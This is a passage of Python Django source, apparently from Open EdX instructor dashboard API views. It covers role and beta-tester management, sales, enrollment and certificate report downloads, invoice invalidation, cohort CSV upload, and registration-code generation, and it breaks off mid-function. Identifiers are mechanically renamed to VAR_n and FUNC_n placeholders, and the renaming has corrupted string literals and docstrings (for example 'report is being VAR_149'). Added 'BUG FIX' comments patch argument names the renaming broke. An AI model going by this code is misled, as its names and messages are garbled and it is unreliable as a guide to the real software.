                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized VAR_57 '{}'".format(VAR_57)
                ))
        except ValidationError:
            VAR_51.append({
                'identifier': identifier,
                'invalidIdentifier': True,
            })
        except Exception as exc:  # pylint: disable=broad-except
            VAR_0.exception(u"Error while #{}ing student")
            VAR_0.exception(exc)
            VAR_51.append({
                'identifier': identifier,
                'error': True,
            })
        else:
            ManualEnrollmentAudit.create_manual_enrollment_audit(
                VAR_9.user, VAR_14, VAR_23, VAR_22, VAR_55
            )
            VAR_51.append({
                'identifier': identifier,
                'before': VAR_200.to_dict(),
                'after': VAR_201.to_dict(),
            })
    VAR_63 = {
        'action': VAR_57,
        'results': VAR_51,
        'auto_enroll': VAR_60,
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_0
@FUNC_1(
    VAR_59="stringified list of VAR_133 and/or usernames",
    VAR_57="add or remove",
)
def FUNC_13(VAR_9, VAR_10):
    """Add or remove the 'beta' tester role for a batch of students.

    Optionally emails each student and auto-enrolls them in the course.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_57 = VAR_9.POST.get('action')
    VAR_58 = VAR_9.POST.get('identifiers')
    VAR_59 = FUNC_63(VAR_58)
    VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
    VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
    VAR_51 = []
    VAR_64 = 'beta'
    VAR_65 = get_course_by_id(VAR_10)
    VAR_25 = {}
    if VAR_61:
        VAR_168 = VAR_9.is_secure()
        # Bug fix: keyword values referenced the undefined names
        # ``auto_enroll``/``secure`` (NameError); use the local variables.
        VAR_25 = get_email_params(VAR_65, VAR_60=VAR_60, VAR_168=VAR_168)
    for identifier in VAR_59:
        try:
            VAR_169 = False
            VAR_195 = False
            VAR_19 = get_student_from_identifier(identifier)
            if VAR_57 == 'add':
                allow_access(VAR_65, VAR_19, VAR_64)
            elif VAR_57 == 'remove':
                revoke_access(VAR_65, VAR_19, VAR_64)
            else:
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized VAR_57 '{}'".format(VAR_57)
                ))
        except User.DoesNotExist:
            VAR_169 = True
            VAR_195 = True
        except Exception as exc:  # pylint: disable=broad-except
            VAR_0.exception(u"Error while #{}ing student")
            VAR_0.exception(exc)
            VAR_169 = True
        else:
            if VAR_61:
                send_beta_role_email(VAR_57, VAR_19, VAR_25)
            if VAR_60:
                if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
                    CourseEnrollment.enroll(VAR_19, VAR_10)
        finally:
            # Always report a result for the identifier, even on failure.
            VAR_51.append({
                'identifier': identifier,
                'error': VAR_169,
                'userDoesNotExist': VAR_195
            })
    VAR_63 = {
        'action': VAR_57,
        'results': VAR_51,
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_0
@FUNC_1(
    VAR_141="email or VAR_15 of VAR_19 to change access",
    VAR_64="'instructor', 'staff', 'beta', or 'ccx_coach'",
    VAR_57="'allow' or 'revoke'"
)
def FUNC_14(VAR_9, VAR_10):
    """Grant or revoke a course-level role for one user.

    Rejects unknown roles, inactive users, and an instructor removing
    their own instructor role.  Returns JSON describing the result.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'instructor', VAR_10, depth=None
    )
    try:
        VAR_19 = get_student_from_identifier(VAR_9.POST.get('unique_student_identifier'))
    except User.DoesNotExist:
        VAR_63 = {
            'unique_student_identifier': VAR_9.POST.get('unique_student_identifier'),
            'userDoesNotExist': True,
        }
        return JsonResponse(VAR_63)
    # Inactive (never-activated) accounts cannot hold course roles.
    if not VAR_19.is_active:
        VAR_63 = {
            'unique_student_identifier': VAR_19.username,
            'inactiveUser': True,
        }
        return JsonResponse(VAR_63)
    VAR_64 = VAR_9.POST.get('rolename')
    VAR_57 = VAR_9.POST.get('action')
    if VAR_64 not in ROLES:
        VAR_169 = strip_tags("unknown VAR_64 '{}'".format(VAR_64))
        VAR_0.error(VAR_169)
        return HttpResponseBadRequest(VAR_169)
    # Refuse to let an instructor strip their own instructor access.
    if VAR_64 == 'instructor' and VAR_19 == VAR_9.user and VAR_57 != 'allow':
        VAR_63 = {
            'unique_student_identifier': VAR_19.username,
            'rolename': VAR_64,
            'action': VAR_57,
            'removingSelfAsInstructor': True,
        }
        return JsonResponse(VAR_63)
    if VAR_57 == 'allow':
        allow_access(VAR_65, VAR_19, VAR_64)
    elif VAR_57 == 'revoke':
        revoke_access(VAR_65, VAR_19, VAR_64)
    else:
        return HttpResponseBadRequest(strip_tags(
            "unrecognized VAR_57 '{}'".format(VAR_57)
        ))
    VAR_63 = {
        'unique_student_identifier': VAR_19.username,
        'rolename': VAR_64,
        'action': VAR_57,
        'success': 'yes',
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_1(VAR_64="'instructor', 'staff', or 'beta'")
def FUNC_15(VAR_9, VAR_10):
    """List the members holding a given course role as JSON."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'instructor', VAR_10, depth=None
    )
    VAR_64 = VAR_9.POST.get('rolename')
    if VAR_64 not in ROLES:
        return HttpResponseBadRequest()

    def FUNC_84(VAR_19):
        # Serialize the user fields the dashboard displays.
        return {
            'username': VAR_19.username,
            'email': VAR_19.email,
            'first_name': VAR_19.first_name,
            'last_name': VAR_19.last_name,
        }

    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        VAR_64: map(FUNC_84, list_with_level(
            VAR_65, VAR_64
        )),
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_16(VAR_9, VAR_10):
    """Queue a CSV report of student responses for one problem.

    The POSTed ``problem_location`` must parse to a usage key belonging to
    this course; otherwise a 400 JSON response is returned.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_66 = VAR_9.POST.get('problem_location', '')
    try:
        VAR_170 = UsageKey.from_string(VAR_66)
        VAR_171 = VAR_170.run
        if not VAR_171:
            # Old-style (deprecated) location strings have no run; re-parse
            # them relative to this course.
            VAR_170 = VAR_38.make_usage_key_from_deprecated_string(VAR_66)
        if VAR_170.course_key != VAR_38:
            # Bug fix: previously raised with the undefined name
            # ``problem_key`` (NameError); report the offending string.
            raise InvalidKeyError(type(VAR_170), VAR_66)
    except InvalidKeyError:
        return JsonResponseBadRequest(_("Could not find problem with this location."))
    try:
        instructor_task.api.submit_calculate_problem_responses_csv(VAR_9, VAR_38, VAR_66)
        VAR_172 = _(
            "The problem responses report is being VAR_149."
            " To view the status of the report, see Pending Tasks below."
        )
        return JsonResponse({"status": VAR_172})
    except AlreadyRunningError:
        VAR_196 = _(
            "A problem responses report generation VAR_150 is already in progress. "
            "Check the 'Pending Tasks' table for the status of the VAR_150. "
            "When completed, the report will be available for download in the table below."
        )
        return JsonResponse({"status": VAR_196})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_17(VAR_9, VAR_10):
    """Return a JSON summary of the course's grading configuration."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_with_access(
        VAR_9.user, 'staff', course_key, depth=None
    )
    summary = instructor_analytics.basic.dump_grading_context(course)
    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'grading_config_summary': summary,
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_18(VAR_9, VAR_10, VAR_26=False):  # pylint: disable=unused-argument, redefined-outer-VAR_16
    """Return e-commerce sale/invoice records, as JSON or as a CSV download.

    ``VAR_26`` (truthy) selects the CSV response.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_68 = [
        'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
        'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
        'internal_reference', 'invoice_number', 'codes', 'course_id'
    ]
    VAR_69 = instructor_analytics.basic.sale_record_features(VAR_10, VAR_68)
    if not VAR_26:
        # JSON path: flatten the creator object to its username.
        for VAR_197 in VAR_69:
            VAR_197['created_by'] = VAR_197['created_by'].username
        VAR_63 = {
            'course_id': VAR_10.to_deprecated_string(),
            'sale': VAR_69,
            'queried_features': VAR_68
        }
        return JsonResponse(VAR_63)
    else:
        VAR_86, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_68)
        return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", VAR_86, VAR_73)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_19(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """Return a CSV download of detailed sale-order records for the course."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # Pairs of (internal feature key, human-readable CSV column header).
    feature_columns = [
        ('id', 'Order Id'),
        ('company_name', 'Company Name'),
        ('company_contact_name', 'Company Contact Name'),
        ('company_contact_email', 'Company Contact Email'),
        ('logged_in_username', 'Login Username'),
        ('logged_in_email', 'Login User Email'),
        ('purchase_time', 'Date of Sale'),
        ('customer_reference_number', 'Customer Reference Number'),
        ('recipient_name', 'Recipient Name'),
        ('recipient_email', 'Recipient Email'),
        ('bill_to_street1', 'Street 1'),
        ('bill_to_street2', 'Street 2'),
        ('bill_to_city', 'City'),
        ('bill_to_state', 'State'),
        ('bill_to_postalcode', 'Postal Code'),
        ('bill_to_country', 'Country'),
        ('order_type', 'Order Type'),
        ('status', 'Order Item Status'),
        ('coupon_code', 'Coupon Code'),
        ('list_price', 'List Price'),
        ('unit_cost', 'Unit Price'),
        ('quantity', 'Quantity'),
        ('total_discount', 'Total Discount'),
        ('total_amount', 'Total Amount Paid'),
    ]
    feature_keys = [pair[0] for pair in feature_columns]
    column_headers = [pair[1] for pair in feature_columns]
    order_records = instructor_analytics.basic.sale_order_record_features(VAR_10, feature_keys)
    __, rows = instructor_analytics.csvs.format_dictlist(order_records, feature_keys)
    return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", column_headers, rows)
@FUNC_2('staff')
@require_POST
def FUNC_20(VAR_9, VAR_10):
    """Invalidate or re-activate the sale attached to an invoice.

    POST params: `invoice_number` (int) and `event_type`
    ("invalidate" or anything else, treated as re-activate).
    """
    try:
        VAR_173 = VAR_9.POST["invoice_number"]
    except KeyError:
        return HttpResponseBadRequest("Missing required invoice_number parameter")
    try:
        VAR_173 = int(VAR_173)
    except ValueError:
        return HttpResponseBadRequest(
            "invoice_number must be an integer, {value} provided".format(
                value=VAR_173
            )
        )
    try:
        VAR_174 = VAR_9.POST["event_type"]
    except KeyError:
        return HttpResponseBadRequest("Missing required event_type parameter")
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        # BUG FIX: the lookup used `VAR_10=course_id`, where `course_id` is
        # an undefined name (NameError); the model field is `course_id` and
        # the local course key is VAR_10.
        VAR_27 = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
            invoice_id=VAR_173,
            course_id=VAR_10
        )
        VAR_27 = VAR_27.invoice
    except CourseRegistrationCodeInvoiceItem.DoesNotExist:  # Check for old type invoices
        return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=VAR_173))
    if VAR_174 == "invalidate":
        return FUNC_21(VAR_27)
    else:
        return FUNC_22(VAR_27)
def FUNC_21(VAR_27):
    """Mark the given invoice as invalid; reject if already invalidated."""
    if not VAR_27.is_valid:
        return HttpResponseBadRequest(_("The sale associated with this VAR_29 has already been invalidated."))
    # Flip the flag and persist before building the confirmation message.
    VAR_27.is_valid = False
    VAR_27.save()
    confirmation = _('Invoice number {0} has been invalidated.').format(VAR_27.id)
    return JsonResponse({'message': confirmation})
def FUNC_22(VAR_27):
    """Re-activate a previously invalidated invoice."""
    if VAR_27.is_valid:
        return HttpResponseBadRequest(_("This VAR_29 is already active."))
    # Flip the flag and persist before building the confirmation message.
    VAR_27.is_valid = True
    VAR_27.save()
    confirmation = _('The registration codes for VAR_29 {0} have been re-activated.').format(VAR_27.id)
    return JsonResponse({'message': confirmation})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_23(VAR_9, VAR_10):
    """Report counts of issued certificates grouped by certificate mode.

    Responds with CSV when the request carries ``?csv=true``; JSON otherwise.
    """
    course_key = CourseKey.from_string(VAR_10)
    features = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
    # (feature key, translated display name) pairs for headers / labels.
    feature_names = [
        ('course_id', _('CourseID')),
        ('mode', _('Certificate Type')),
        ('total_issued_certificate', _('Total Certificates Issued')),
        ('report_run_date', _('Date Report Run'))
    ]
    certificates = instructor_analytics.basic.issued_certificates(course_key, features)
    if VAR_9.GET.get('csv', 'false').lower() == 'true':
        __, rows = instructor_analytics.csvs.format_dictlist(certificates, features)
        headers = [display for __, display in feature_names]
        return instructor_analytics.csvs.create_csv_response(
            'issued_certificates.csv',
            headers,
            rows
        )
    return JsonResponse({
        'certificates': certificates,
        'queried_features': features,
        'feature_names': dict(feature_names)
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_24(VAR_9, VAR_10, VAR_26=False):  # pylint: disable=redefined-outer-VAR_16
    """Return profile features of enrolled students.

    With VAR_26 falsy the data is returned inline as JSON; otherwise an
    asynchronous CSV-generation task is queued and a status message returned.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_65 = get_course_by_id(VAR_38)
    VAR_78 = instructor_analytics.basic.AVAILABLE_FEATURES
    # Microsites may override the set of downloadable profile fields.
    VAR_68 = list(microsite.get_value('student_profile_download_fields', []))
    if not VAR_68:
        # BUG FIX: this fallback list was assigned to the undefined name
        # `query_features`, so the default never took effect and VAR_68
        # stayed empty; assign it to VAR_68.
        VAR_68 = [
            'id', 'username', 'name', 'email', 'language', 'location',
            'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
            'goals',
        ]
    # Translated display names for each feature key.
    VAR_76 = {
        'id': _('User ID'),
        'username': _('Username'),
        'name': _('Name'),
        'email': _('Email'),
        'language': _('Language'),
        'location': _('Location'),
        'year_of_birth': _('Birth Year'),
        'gender': _('Gender'),
        'level_of_education': _('Level of Education'),
        'mailing_address': _('Mailing Address'),
        'goals': _('Goals'),
    }
    if is_course_cohorted(VAR_65.id):
        # Translators: 'Cohort' refers to a group of students within a course.
        VAR_68.append('cohort')
        VAR_76['cohort'] = _('Cohort')
    if VAR_65.teams_enabled:
        VAR_68.append('team')
        VAR_76['team'] = _('Team')
    VAR_68.append('city')
    VAR_76['city'] = _('City')
    VAR_68.append('country')
    VAR_76['country'] = _('Country')
    if not VAR_26:
        VAR_175 = instructor_analytics.basic.enrolled_students_features(VAR_38, VAR_68)
        VAR_63 = {
            'course_id': unicode(VAR_38),
            'students': VAR_175,
            'students_count': len(VAR_175),
            'queried_features': VAR_68,
            'feature_names': VAR_76,
            'available_features': VAR_78,
        }
        return JsonResponse(VAR_63)
    else:
        try:
            instructor_task.api.submit_calculate_students_features_csv(VAR_9, VAR_38, VAR_68)
            VAR_172 = _("The enrolled learner VAR_54 report is being VAR_149."
                        " To view the status of the report, see Pending Tasks below.")
            return JsonResponse({"status": VAR_172})
        except AlreadyRunningError:
            VAR_196 = _(
                "This enrollment report is currently being VAR_149."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete.")
            return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_25(VAR_9, VAR_10):
    """Queue the asynchronous 'learners who may enroll' CSV report task."""
    course_key = CourseKey.from_string(VAR_10)
    try:
        instructor_task.api.submit_calculate_may_enroll_csv(VAR_9, course_key, ['email'])
        status = _(
            "The enrollment report is being VAR_149. This report contains"
            " information about learners who can enroll in the VAR_65."
            " To view the status of the report, see Pending Tasks below."
        )
    except AlreadyRunningError:
        status = _(
            "This enrollment report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@FUNC_2('staff')
def FUNC_26(VAR_9, VAR_10):
    """Store an uploaded cohort-assignment CSV and queue the cohorting task.

    The uploaded file must contain a 'cohort' column plus a 'username' and/or
    'email' column; validation failures come back as a 400 JSON error.
    """
    VAR_38 = SlashSeparatedCourseKey.from_string(VAR_10)
    try:
        def FUNC_87(VAR_176, VAR_177):
            """Raise FileValidationException unless required columns exist."""
            with VAR_176.open(VAR_177) as f:
                VAR_207 = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
                try:
                    VAR_210 = next(VAR_207)
                except StopIteration:
                    VAR_210 = []
                VAR_180 = None
                if "cohort" not in VAR_210:
                    VAR_180 = _("The file must contain a 'cohort' column containing cohort names.")
                elif "email" not in VAR_210 and "username" not in VAR_210:
                    VAR_180 = _("The file must contain a 'username' column, an 'email' column, or both.")
                if VAR_180:
                    raise FileValidationException(VAR_180)
        VAR_72, VAR_123 = store_uploaded_file(
            VAR_9, 'uploaded-file', ['.csv'],
            course_and_time_based_filename_generator(VAR_38, "cohorts"),
            max_file_size=2000000,  # limit to 2 MB
            # BUG FIX: was `FUNC_87=validator` — `validator` is undefined here.
            # The store_uploaded_file keyword is `validator`; the local
            # validation callable is FUNC_87.
            validator=FUNC_87
        )
        instructor_task.api.submit_cohort_students(VAR_9, VAR_38, VAR_123)
    except (FileValidationException, PermissionDenied) as err:
        return JsonResponse({"error": unicode(err)}, status=400)
    return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_27(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """Return a CSV download describing every coupon defined for the course."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # BUG FIX: the filter used `VAR_10=course_id`, where `course_id` is an
    # undefined name (NameError); the model field is `course_id` and the
    # local course key is VAR_10.
    VAR_79 = Coupon.objects.filter(course_id=VAR_10)
    # Pairs of (feature key, translated CSV column header).
    VAR_68 = [
        ('code', _('Coupon Code')),
        ('course_id', _('Course Id')),
        ('percentage_discount', _('% Discount')),
        ('description', _('Description')),
        ('expiration_date', _('Expiration Date')),
        ('is_active', _('Is Active')),
        ('code_redeemed_count', _('Code Redeemed Count')),
        ('total_discounted_seats', _('Total Discounted Seats')),
        ('total_discounted_amount', _('Total Discounted Amount')),
    ]
    VAR_70 = [x[0] for x in VAR_68]
    VAR_71 = [x[1] for x in VAR_68]
    VAR_80 = instructor_analytics.basic.coupon_codes_features(VAR_70, VAR_79, VAR_10)
    VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_80, VAR_70)
    return instructor_analytics.csvs.create_csv_response('Coupons.csv', VAR_71, VAR_81)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_5
def FUNC_28(VAR_9, VAR_10):
    """Queue the asynchronous detailed-enrollment CSV report task."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_detailed_enrollment_features_csv(VAR_9, course_key)
        status = _("The detailed enrollment report is being VAR_149."
                   " To view the status of the report, see Pending Tasks below.")
    except AlreadyRunningError:
        status = _("The detailed enrollment report is being VAR_149."
                   " To view the status of the report, see Pending Tasks below."
                   " You will be able to download the report when it is complete.")
    return JsonResponse({
        "status": status
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_5
def FUNC_29(VAR_9, VAR_10):
    """Queue the asynchronous executive-summary report task."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_executive_summary_report(VAR_9, course_key)
        status = _("The executive summary report is being VAR_149."
                   " To view the status of the report, see Pending Tasks below.")
    except AlreadyRunningError:
        status = _(
            "The executive summary report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({
        "status": status
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_30(VAR_9, VAR_10):
    """Queue the asynchronous course-survey report task."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_course_survey_report(VAR_9, course_key)
        status = _("The survey report is being VAR_149."
                   " To view the status of the report, see Pending Tasks below.")
    except AlreadyRunningError:
        status = _(
            "The survey report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({
        "status": status
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_31(VAR_9, VAR_10):
    """Queue the asynchronous proctored-exam results report task."""
    # Columns included in the generated report.
    features = [
        'user_email',
        'exam_name',
        'attempt_code',
        'allowed_time_limit_mins',
        'is_sample_attempt',
        'started_at',
        'completed_at',
        'status',
    ]
    course_key = CourseKey.from_string(VAR_10)
    try:
        instructor_task.api.submit_proctored_exam_results_report(VAR_9, course_key, features)
        status = _("The proctored exam VAR_51 report is being VAR_149."
                   " To view the status of the report, see Pending Tasks below.")
    except AlreadyRunningError:
        status = _(
            "The proctored exam VAR_51 report is currently being VAR_149."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    return JsonResponse({
        "status": status
    })
def FUNC_32(VAR_19, VAR_10, VAR_28, VAR_29=None, VAR_30=None, VAR_31=None):
    """Create and persist a unique CourseRegistrationCode.

    Generates a random code, and recursively retries with a fresh code when
    the candidate collides with an active coupon or hits the table's unique
    constraint.

    BUG FIX: several keyword arguments below had keyword and value swapped
    by a bad rename (e.g. ``VAR_82=code`` where ``code`` is undefined);
    restored the real model fields / this function's own parameters.
    """
    VAR_82 = FUNC_34()
    # Avoid clashing with an active coupon code; regenerate if taken.
    VAR_83 = Coupon.objects.filter(code=VAR_82, is_active=True)
    if VAR_83:
        return FUNC_32(
            VAR_19, VAR_10, VAR_28, VAR_29=VAR_29, VAR_30=VAR_30, VAR_31=VAR_31
        )
    VAR_84 = CourseRegistrationCode(
        code=VAR_82,
        course_id=unicode(VAR_10),
        created_by=VAR_19,
        invoice=VAR_29,
        order=VAR_30,
        mode_slug=VAR_28,
        invoice_item=VAR_31
    )
    try:
        with transaction.atomic():
            VAR_84.save()
        return VAR_84
    except IntegrityError:
        # Another process saved the same code concurrently — try again.
        return FUNC_32(
            VAR_19, VAR_10, VAR_28, VAR_29=VAR_29, VAR_30=VAR_30, VAR_31=VAR_31
        )
def FUNC_33(VAR_32, VAR_33, VAR_34=None):
    """Build a CSV HTTP response (named VAR_32) for the given registration codes."""
    features = [
        'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
        'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
    ]
    code_records = instructor_analytics.basic.course_registration_features(features, VAR_33, VAR_34)
    header, rows = instructor_analytics.csvs.format_dictlist(code_records, features)
    return instructor_analytics.csvs.create_csv_response(VAR_32, header, rows)
def FUNC_34():
    """Generate a random registration code of the configured length (default 8)."""
    return FUNC_7(getattr(settings, 'REGISTRATION_CODE_LENGTH', 8))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_35(VAR_9, VAR_10):
    """Download a CSV of all registration codes for the course, optionally
    filtered by the company name posted as `download_company_name`.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # BUG FIX: the filter used `VAR_10=course_id` (undefined `course_id`,
    # NameError) and the company filter referenced the pre-rename name
    # `registration_codes`; both now use the defined local names.
    VAR_85 = CourseRegistrationCode.objects.filter(
        course_id=VAR_10
    ).order_by('invoice_item__invoice__company_name')
    VAR_88 = VAR_9.POST['download_company_name']
    if VAR_88:
        VAR_85 = VAR_85.filter(invoice_item__invoice__company_name=VAR_88)
    VAR_34 = 'download'
    return FUNC_33("Registration_Codes.csv", VAR_85, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_4
@require_POST
def FUNC_36(VAR_9, VAR_10):
    """Generate registration codes for an invoice-based (bulk) purchase.

    Creates the invoice and its course line item, generates the requested
    number of registration codes, emails a sale summary with CSV and invoice
    attachments to the recipients, and returns the codes as a CSV download.

    BUG FIX: many keyword arguments in this function had keyword and value
    swapped by a bad rename (e.g. ``VAR_88=company_name`` where
    ``company_name`` is undefined), and ``reverse()`` was called with the
    mangled keyword ``VAR_3`` instead of ``kwargs``; restored the real model
    field / API keyword on the left and the defined local on the right.
    Also fixed the undefined ``recipient_list`` / ``invoice_item`` references.
    """
    VAR_10 = CourseKey.from_string(VAR_10)
    VAR_89 = False
    # Quantity may arrive as "5" or "5.0"; normalise to int.
    try:
        VAR_179 = int(VAR_9.POST['total_registration_codes'])
    except ValueError:
        VAR_179 = int(float(VAR_9.POST['total_registration_codes']))
    VAR_88 = VAR_9.POST['company_name']
    VAR_90 = VAR_9.POST['company_contact_name']
    VAR_91 = VAR_9.POST['company_contact_email']
    VAR_92 = VAR_9.POST['unit_price']
    try:
        # Normalise the price to two decimal places, rounding down.
        VAR_92 = (
            decimal.Decimal(VAR_92)
        ).quantize(
            decimal.Decimal('.01'),
            rounding=decimal.ROUND_DOWN
        )
    except decimal.InvalidOperation:
        return HttpResponse(
            status=400,
            content=_(u"Could not parse amount as a decimal")
        )
    VAR_93 = VAR_9.POST['recipient_name']
    VAR_94 = VAR_9.POST['recipient_email']
    VAR_95 = VAR_9.POST['address_line_1']
    VAR_96 = VAR_9.POST['address_line_2']
    VAR_97 = VAR_9.POST['address_line_3']
    VAR_98 = VAR_9.POST['city']
    VAR_99 = VAR_9.POST['state']
    VAR_100 = VAR_9.POST['zip']
    VAR_17 = VAR_9.POST['country']
    VAR_101 = VAR_9.POST['internal_reference']
    VAR_102 = VAR_9.POST['customer_reference_number']
    VAR_103 = [VAR_94]
    if VAR_9.POST.get('invoice', False):
        # Copy the requesting user when an invoice copy was requested.
        VAR_103.append(VAR_9.user.email)
        VAR_89 = True
    VAR_104 = VAR_92 * VAR_179
    set_user_preference(VAR_9.user, INVOICE_KEY, VAR_89)
    VAR_105 = Invoice.objects.create(
        total_amount=VAR_104,
        company_name=VAR_88,
        company_contact_email=VAR_91,
        company_contact_name=VAR_90,
        course_id=VAR_10,
        recipient_name=VAR_93,
        recipient_email=VAR_94,
        address_line_1=VAR_95,
        address_line_2=VAR_96,
        address_line_3=VAR_97,
        city=VAR_98,
        state=VAR_99,
        zip=VAR_100,
        country=VAR_17,
        internal_reference=VAR_101,
        customer_reference_number=VAR_102
    )
    VAR_31 = CourseRegistrationCodeInvoiceItem.objects.create(
        invoice=VAR_105,
        qty=VAR_179,
        unit_price=VAR_92,
        course_id=VAR_10
    )
    VAR_65 = get_course_by_id(VAR_10, depth=0)
    VAR_106 = CourseMode.paid_modes_for_course(VAR_10)
    if len(VAR_106) != 1:
        # Registration codes only make sense with exactly one paid mode.
        VAR_180 = (
            u"Generating Code Redeem Codes for Course '{VAR_10}', which must have a single paid VAR_65 VAR_20. "
            u"This is a configuration issue. Current VAR_65 modes with payment options: {VAR_106}"
        ).format(VAR_10=VAR_10, VAR_106=VAR_106)
        VAR_0.error(VAR_180)
        return HttpResponse(
            status=500,
            content=_(u"Unable to generate redeem codes because of VAR_65 misconfiguration.")
        )
    VAR_24 = VAR_106[0]
    VAR_107 = VAR_24.min_price
    VAR_85 = []
    for VAR_72 in range(VAR_179):
        VAR_181 = FUNC_32(
            VAR_9.user, VAR_10, VAR_24.slug, VAR_29=VAR_105, VAR_30=None, VAR_31=VAR_31
        )
        VAR_85.append(VAR_181)
    VAR_108 = microsite.get_value('SITE_NAME', 'localhost')
    VAR_109 = VAR_179
    VAR_110 = (float(VAR_109 * VAR_107) - float(VAR_104))
    VAR_111 = '{base_url}{course_about}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        course_about=reverse('about_course', kwargs={'course_id': VAR_10.to_deprecated_string()})
    )
    VAR_112 = '{base_url}{dashboard}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        dashboard=reverse('dashboard')
    )
    try:
        VAR_182 = VAR_105.generate_pdf_invoice(VAR_65, VAR_107, int(VAR_109), float(VAR_104))
    except Exception:  # pylint: disable=broad-except
        # Best effort: fall back to a plain-text notice if PDF generation fails.
